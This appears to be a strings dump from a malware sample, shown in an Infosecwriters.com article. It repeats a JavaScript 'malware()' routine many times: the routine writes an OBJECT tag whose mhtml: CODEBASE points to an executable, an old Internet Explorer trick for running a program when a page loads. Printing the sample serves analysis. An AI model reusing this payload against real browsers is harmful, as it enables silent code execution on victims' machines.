00006CD8 00406CD8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006E42 00406E42 0 setTimeout("malware()",150)

00006E5F 00406E5F 0 </script><body bgcolor=black scroll=no>

00006E87 00406E87 0 <SCRIPT>

00006E90 00406E90 0 function malware()

00006EA5 00406EA5 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006EDB 00406EDB 0 path=unescape(path);

00006EF0 00406EF0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000705A 0040705A 0 setTimeout("malware()",150)

00007077 00407077 0 </script><body bgcolor=black scroll=no>

0000709F 0040709F 0 <SCRIPT>

000070A8 004070A8 0 function malware()

000070BD 004070BD 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000070F3 004070F3 0 path=unescape(path);

00007108 00407108 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007272 00407272 0 setTimeout("malware()",150)

0000728F 0040728F 0 </script><body bgcolor=black scroll=no>

000072B7 004072B7 0 <SCRIPT>

000072C0 004072C0 0 function malware()

000072D5 004072D5 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

0000730B 0040730B 0 path=unescape(path);

00007320 00407320 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000748A 0040748A 0 setTimeout("malware()",150)

000074A7 004074A7 0 </script><body bgcolor=black scroll=no>

000074CF 004074CF 0 <SCRIPT>

000074D8 004074D8 0 function malware()

000074ED 004074ED 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007523 00407523 0 path=unescape(path);

00007538 00407538 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

000076A2 004076A2 0 setTimeout("malware()",150)

000076BF 004076BF 0 </script><body bgcolor=black scroll=no>

000076E7 004076E7 0 <SCRIPT>

000076F0 004076F0 0 function malware()

00007705 00407705 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

0000773B 0040773B 0 path=unescape(path);

00007750 00407750 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

000078BA 004078BA 0 setTimeout("malware()",150)

000078D7 004078D7 0 </script><body bgcolor=black scroll=no>

000078FF 004078FF 0 <SCRIPT>

00007908 00407908 0 function malware()

File pos Mem pos ID Text

======== ======= == ====

0000791D 0040791D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007953 00407953 0 path=unescape(path);

00007968 00407968 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007AD2 00407AD2 0 setTimeout("malware()",150)

00007AEF 00407AEF 0 </script><body bgcolor=black scroll=no>

00007B17 00407B17 0 <SCRIPT>

00007B20 00407B20 0 function malware()

00007B35 00407B35 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007B6B 00407B6B 0 path=unescape(path);

00007B80 00407B80 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007CEA 00407CEA 0 setTimeout("malware()",150)

00007D07 00407D07 0 </script><body bgcolor=black scroll=no>

00007D2F 00407D2F 0 <SCRIPT>

00007D38 00407D38 0 function malware()

00007D4D 00407D4D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007D83 00407D83 0 path=unescape(path);

00007D98 00407D98 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007F02 00407F02 0 setTimeout("malware()",150)

00007F1F 00407F1F 0 </script><body bgcolor=black scroll=no>

00007F47 00407F47 0 <SCRIPT>

00007F50 00407F50 0 function malware()

00007F65 00407F65 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007F9B 00407F9B 0 path=unescape(path);

00007FB0 00407FB0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000811A 0040811A 0 setTimeout("malware()",150)

00008137 00408137 0 </script><body bgcolor=black scroll=no>

0000815F 0040815F 0 <SCRIPT>

00008168 00408168 0 function malware()

0000817D 0040817D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000081B3 004081B3 0 path=unescape(path);

000081C8 004081C8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00008332 00408332 0 setTimeout("malware()",150)

0000834F 0040834F 0 </script>

00005715 00474915 0 p value

0000573C 0047493C 0 {9BA05972-F6A8-11CF-A442-00A0C90A8F39}

Rate this article

All images, content & text (unless other ownership applies) are © copyrighted 2000 -  , Infosecwriters.com. All rights reserved. Comments are property of the respective posters.